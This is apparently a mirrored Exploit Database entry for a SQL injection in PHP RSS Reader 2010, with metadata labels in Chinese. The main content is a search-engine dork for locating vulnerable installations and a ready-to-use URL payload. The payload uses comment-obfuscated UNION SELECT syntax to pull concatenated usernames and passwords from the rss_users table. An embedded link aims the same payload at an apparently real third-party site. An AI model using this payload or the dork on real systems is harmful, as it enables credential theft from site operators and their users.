PHP RSS Reader 2010 – SQL Injection

• Exploit Database
• 16 阅读

• 作者： mishal abdullah
  日期： 2013-10-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/29258/

• # Exploit Title: [PHP RSS READER 2010 SQLI]
  # Google Dork: [Copyright 2010 - Powered By - PHP RSS Reader]
  # Date: [28/10/2013]
  # Exploit Author: [rDNix]
  # Vendor Homepage: [http://www.phprssreader.com/]
  # Version: [2010]
  
  Exploit :-
  
  http://www.site.com/[phprssreader]/null'%20/*!uNION*/%20/*!select*/%201,2,3,/*!concat(username,password)*/,5,6,7,8,9,10,11%20from%20rss_users--+<http://www.kt.com.kw/read2/null'%20/*!uNION*/%20/*!select*/%201,2,3,/*!concat(username,password)*/,5,6,7,8,9,10,11%20from%20rss_users--+>
  
  
  By : rDNix
  Contact : Mynamemishal@gmail.com